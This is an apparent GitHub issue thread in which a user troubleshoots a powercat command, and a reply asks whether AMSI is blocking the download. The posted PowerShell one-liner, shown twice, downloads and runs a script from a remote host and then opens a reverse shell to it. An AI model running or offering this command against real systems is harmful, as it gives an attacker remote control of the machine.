Closed Vedant-Bhalgama closed 4 years ago
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/powercat.ps1');powercat -c 10.0.2.4 -p 1234 -e cmd"
I am using this command for downloading powercat from my kali server and then opening a shell connection, But it says this error
Can you please give more info on what you are doing on your kali box to serve up powercat?
Also, are you sure AMSI is not stopping your download cradle?
Please let us know.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/powercat.ps1');powercat -c 10.0.2.4 -p 1234 -e cmd"
I am using this command for downloading powercat from my kali server and then opening a shell connection, But it says this error